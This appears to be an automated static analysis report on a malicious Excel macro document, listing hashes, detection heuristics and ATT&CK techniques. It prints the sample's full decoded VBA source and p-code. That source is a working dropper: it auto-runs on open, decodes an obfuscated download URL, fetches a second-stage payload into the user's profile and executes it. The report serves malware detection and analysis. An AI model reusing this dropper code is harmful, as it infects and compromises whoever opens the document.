Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 13f8ee3611b21491…

MALICIOUS

Office (OLE)

96.5 KB Created: 2020-07-19 20:42:23 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 708e5b0d67f6379d279bf2b060653bda SHA-1: 7dd2e087f84fdc2a9675f0e461ef21f51d527f7a SHA-256: 13f8ee3611b21491b9c150d348724cc9f3eb60e7a965be057e22ae0165a6dffd
284 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

This Excel document contains VBA macros that are designed to execute upon opening, as indicated by the Workbook_Open and Auto_Open heuristics. The script attempts to download a second-stage payload from the URL "http://fyf/k2JXrMDsoxSF7R0QjelkI0tf/thojwpntcbmutfupsq00;tquui" and save it to the user's profile directory as "fyf/uuoo". The presence of ShellExecute and URLDownloadToFile API calls, along with the macro-enable lure in the document body, strongly suggests a malicious dropper.

Heuristics 9

  • ClamAV: Xls.Dropper.Agent-9207294-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-9207294-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function kgUpfVkuddPCezM Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal bIZLPpebUnkHdBHD As Long, ByVal PShCENXRvLeyRLBhRvLeyRLBhqqpufX As String, _
ByVal fJVVmpskIXQAilFim As String, ByVal AKgtgSuQOrYqcgFgrlD As Long, ByVal AXtRKGRjxS As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
descifrar = UserProfile
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TqZlrnyPQmoxUTqZlrnyPQmoxU = Decrypt("fyf/uuoo")
BfvciBJyeZZBfvciBJyeZZ = Environ$("UserProfile") & "\" & TqZlrnyPQmoxUTqZlrnyPQmoxU
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10765 bytes
SHA-256: 0ca5557eb35d5b343c5ac4d7b08743837726a4ebbf4951976e9183a2112e38e6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Fvil()

End Sub

Attribute VB_Name = "HpJMbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function etTime Lib "winmm.dll" () As Long


Private Declare Function timeGetTime Lib "winmm.dll" () As Long

Private Declare PtrSafe Function imeGetTime Lib "winmm.dll" () As Long

Private Declare PtrSafe Function LcDCSIL Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal GPojLNuOTcR As Long, ByVal xGG As String, _
ByVal FKhovZnmC As String, ByVal FIAYohQzBVyDQNwJjjKSgH As String, ByVal bGfwWwHBTDZJUbW As String, ByVal izNVWhEzdeKRksiNIJHMyE As Long) As Long

Private Declare PtrSafe Function kgUpfVkuddPCezM Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal bIZLPpebUnkHdBHD As Long, ByVal PShCENXRvLeyRLBhRvLeyRLBhqqpufX As String, _
ByVal fJVVmpskIXQAilFim As String, ByVal AKgtgSuQOrYqcgFgrlD As Long, ByVal AXtRKGRjxS As Long) As Long

Private Declare PtrSafe Function meGetTime Lib "winmm.dll" () As Long

Sub XdOHOtTFUYcTsVAkgUpfV()
Dim TeMMzzbjwXsWvMYNKEWTeMMzzbjwXsWvMYNKEW As String
Dim TqZlrnyPQmoxUTqZlrnyPQmoxU As String
Dim BfvciBJyeZZBfvciBJyeZZ As String
Dim kuddPCezMbIZLPpebUnkHdkuddPCezMbIZLPpebUnkHd As String
Dim BHDPShCENXBHDPShCENX As String
Dim RvLeyRLBhRvLeyRLBh As String
TqZlrnyPQmoxUTqZlrnyPQmoxU = Decrypt("fyf/uuoo")
BfvciBJyeZZBfvciBJyeZZ = Environ$("UserProfile") & "\" & TqZlrnyPQmoxUTqZlrnyPQmoxU


TeMMzzbjwXsWvMYNKEWTeMMzzbjwXsWvMYNKEW = Decrypt("fyf/k2JXrMDsoxSF7R0QjelkI0tf/thojwpntcbmutfupsq00;tquui")

kgUpfVkuddPCezM 0, TeMMzzbjwXsWvMYNKEWTeMMzzbjwXsWvMYNKEW, BfvciBJyeZZBfvciBJyeZZ, 0, 0
LcDCSIL 0, "open", BfvciBJyeZZBfvciBJyeZZ, "", vbNullString, vbNormalFocus
End Sub

Sub Auto_Open()
descifrar = UserProfile
Run
End Sub

Function rnIkDDisHp4e1dEwtDO8XRgW() As Currency
Call t5IOznwCrlt5IOznwCrl
End Function
Static Function t5IOznwCrlt5IOznwCrl() As Integer
Call Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4
End Function
Function Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4() As Single
Call Jb8AvPk2VRJb8AvPk2VR
End Function
Static Function Jb8AvPk2VRJb8AvPk2VR() As Date
Call TJW8h3uwBHyE3XYkFXIADNkqTJW8h3uwBHyE3XYkFXIADNkq
End Function
Function TJW8h3uwBHyE3XYkFXIADNkqTJW8h3uwBHyE3XYkFXIADNkq() As Variant
Call JxU0xFkI7xJxU0xFkI7x
End Function
Static Function JxU0xFkI7xJxU0xFkI7x() As Date
Call PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6OdVek
End Function
Function PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6OdVek() As Variant
Call EArbhx2errEArb2errEArbhx2errEArb
End Function
Static Function EArbhx2errEArb2errEArbhx2errEArb() As Double
Call DlkYXBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E
End Function
Function DlkYXBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E() As Single
Call FZ4yZFZ4yZPaWVH
End Function

Sub Workbook_Open()

XdOHOtTFUYcTsVAkgUpfV
End Sub

Function Decrypt(enc)
    Dim x
    Dim w
    Dim UserProfile
    Dim Wizx As Double
    enc = StrReverse(enc)
    For w = 1 To Len(enc)
        x = Mid(enc, w, 1)
        UserProfile = UserProfile & Chr(Asc(x) - 1)
    Next
    Decrypt = UserProfile
    For Wizx = 4 To Len(en)
    Next
    
End Function

Function PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6() As Variant
Call hx2errEArb2errEArbhx2errEArb
End Function
Function XBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E() As Single
Call FZ4yZFZ4yZPaWVH
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_qom4bcjh
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 951 bytes
' Line #0:
' 	FuncDefn (Sub timeGetTime())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/HpJMbook - 9607 bytes
' Line #0:
' 	FuncDefn (Private Declare Function LcDCSIL Lib "GPojLNuOTcR" () As Long)
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Private Declare Function xGG Lib "GPojLNuOTcR" () As Long)
' Line #4:
' Line #5:
' 	FuncDefn (Private Declare PtrSafe Function FKhovZnmC Lib "GPojLNuOTcR" () As Long)
' Line #6:
' Line #7:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function FIAYohQzBVyDQNwJjjKSgH Lib "fJVVmpskIXQAilFim" (ByVal bGfwWwHBTDZJUbW As Long, ByVal izNVWhEzdeKRksiNIJHMyE As String, ByVal shell32.dll As String, ByVal kgUpfVkuddPCezM As String, ByVal bIZLPpebUnkHdBHD As String, ByVal PShCENXRvLeyRLBhRvLeyRLBhqqpufX As Long) As Long)
' Line #8:
' Line #9:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function AKgtgSuQOrYqcgFgrlD Lib "TqZlrnyPQmoxUTqZlrnyPQmoxU" (ByVal AXtRKGRjxS As Long, ByVal urlmon As String, ByVal meGetTime As String, ByVal XdOHOtTFUYcTsVAkgUpfV As Long, ByVal TeMMzzbjwXsWvMYNKEWTeMMzzbjwXsWvMYNKEW As Long) As Long)
' Line #10:
' Line #11:
' 	FuncDefn (Private Declare PtrSafe Function BfvciBJyeZZBfvciBJyeZZ Lib "GPojLNuOTcR" () As Long)
' Line #12:
' Line #13:
' 	FuncDefn (Sub kuddPCezMbIZLPpebUnkHdkuddPCezMbIZLPpebUnkHd())
' Line #14:
' 	Dim 
' 	VarDefn BHDPShCENXBHDPShCENX (As String)
' Line #15:
' 	Dim 
' 	VarDefn RvLeyRLBhRvLeyRLBh (As String)
' Line #16:
' 	Dim 
' 	VarDefn Decrypt (As String)
' Line #17:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #18:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #19:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #20:
' 	LitStr 0x0008 "fyf/uuoo"
' 	ArgsLd Auto_Open 0x0001 
' 	St RvLeyRLBhRvLeyRLBh 
' Line #21:
' 	LitStr 0x000B "UserProfile"
' 	ArgsLd descifrar$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld RvLeyRLBhRvLeyRLBh 
' 	Concat 
' 	St Decrypt 
' Line #22:
' Line #23:
' Line #24:
' 	LitStr 0x0037 "fyf/k2JXrMDsoxSF7R0QjelkI0tf/thojwpntcbmutfupsq00;tquui"
' 	ArgsLd Auto_Open 0x0001 
' 	St BHDPShCENXBHDPShCENX 
' Line #25:
' Line #26:
' 	LitDI2 0x0000 
' 	Ld BHDPShCENXBHDPShCENX 
' 	Ld Decrypt 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall AKgtgSuQOrYqcgFgrlD 0x0005 
' Line #27:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld Decrypt 
' 	LitStr 0x0000 ""
' 	Ld UserProfile 
' 	Ld Run 
' 	ArgsCall FIAYohQzBVyDQNwJjjKSgH 0x0006 
' Line #28:
' 	EndSub 
' Line #29:
' Line #30:
' 	FuncDefn (Sub rnIkDDisHp4e1dEwtDO8XRgW())
' Line #31:
' 	Ld Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4 
' 	St t5IOznwCrlt5IOznwCrl 
' Line #32:
' 	ArgsCall Jb8AvPk2VRJb8AvPk2VR 0x0000 
' Line #33:
' 	EndSub 
' Line #34:
' Line #35:
' 	FuncDefn (Function TJW8h3uwBHyE3XYkFXIADNkqTJW8h3uwBHyE3XYkFXIADNkq(id_FFFE As Currency) As Currency)
' Line #36:
' 	ArgsCall (Call) JxU0xFkI7xJxU0xFkI7x 0x0000 
' Line #37:
' 	EndFunc 
' Line #38:
' 	FuncDefn (Static Function JxU0xFkI7xJxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #39:
' 	ArgsCall (Call) PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6OdVek 0x0000 
' Line #40:
' 	EndFunc 
' Line #41:
' 	FuncDefn (Function PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single)
' Line #42:
' 	ArgsCall (Call) EArbhx2errEArb2errEArbhx2errEArb 0x0000 
' Line #43:
' 	EndFunc 
' Line #44:
' 	FuncDefn (Static Function EArbhx2errEArb2errEArbhx2errEArb(id_FFFE As Date) As Date)
' Line #45:
' 	ArgsCall (Call) DlkYXBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E 0x0000 
' Line #46:
' 	EndFunc 
' Line #47:
' 	FuncDefn (Function DlkYXBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E(id_FFFE As Variant) As Variant)
' Line #48:
' 	ArgsCall (Call) FZ4yZFZ4yZPaWVH 0x0000 
' Line #49:
' 	EndFunc 
' Line #50:
' 	FuncDefn (Static Function FZ4yZFZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #51:
' 	ArgsCall (Call) Workbook_Open 0x0000 
' Line #52:
' 	EndFunc 
' Line #53:
' 	FuncDefn (Function Workbook_Open(id_FFFE As Variant) As Variant)
' Line #54:
' 	ArgsCall (Call) enc 0x0000 
' Line #55:
' 	EndFunc 
' Line #56:
' 	FuncDefn (Static Function enc(id_FFFE As Double) As Double)
' Line #57:
' 	ArgsCall (Call) x 0x0000 
' Line #58:
' 	EndFunc 
' Line #59:
' 	FuncDefn (Function x(id_FFFE As Single) As Single)
' Line #60:
' 	ArgsCall (Call) w 0x0000 
' Line #61:
' 	EndFunc 
' Line #62:
' Line #63:
' 	FuncDefn (Sub Wizx())
' Line #64:
' Line #65:
' 	ArgsCall kuddPCezMbIZLPpebUnkHdkuddPCezMbIZLPpebUnkHd 0x0000 
' Line #66:
' 	EndSub 
' Line #67:
' Line #68:
' 	FuncDefn (Function Auto_Open(StrReverse, id_FFFE As Variant))
' Line #69:
' 	Dim 
' 	VarDefn Chr
' Line #70:
' 	Dim 
' 	VarDefn Asc
' Line #71:
' 	Dim 
' 	VarDefn Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4
' Line #72:
' 	Dim 
' 	VarDefn en (As Double)
' Line #73:
' 	Ld StrReverse 
' 	ArgsLd PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6 0x0001 
' 	St StrReverse 
' Line #74:
' 	StartForVariable 
' 	Ld Asc 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld StrReverse 
' 	FnLen 
' 	For 
' Line #75:
' 	Ld StrReverse 
' 	Ld Asc 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St Chr 
' Line #76:
' 	Ld Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4 
' 	Ld Chr 
' 	ArgsLd XBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd hx2errEArb2errEArbhx2errEArb 0x0001 
' 	Concat 
' 	St Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4 
' Line #77:
' 	StartForVariable 
' 	Next 
' Line #78:
' 	Ld Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4 
' 	St Auto_Open 
' Line #79:
' 	StartForVariable 
' 	Ld en 
' 	EndForVariable 
' 	LitDI2 0x0004 
' 	Ld Sheet1 
' 	FnLen 
' 	For 
' Line #80:
' 	StartForVariable 
' 	Next 
' Line #81:
' Line #82:
' 	EndFunc 
' Line #83:
' Line #84:
' 	FuncDefn (Function Sheet2(id_FFFE As Variant) As Variant)
' Line #85:
' 	ArgsCall (Call) Sheet3 0x0000 
' Line #86:
' 	EndFunc 
' Line #87:
' 	FuncDefn (Function Workbook(id_FFFE As Single) As Single)
' Line #88:
' 	ArgsCall (Call) w 0x0000 
' Line #89:
' 	EndFunc 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.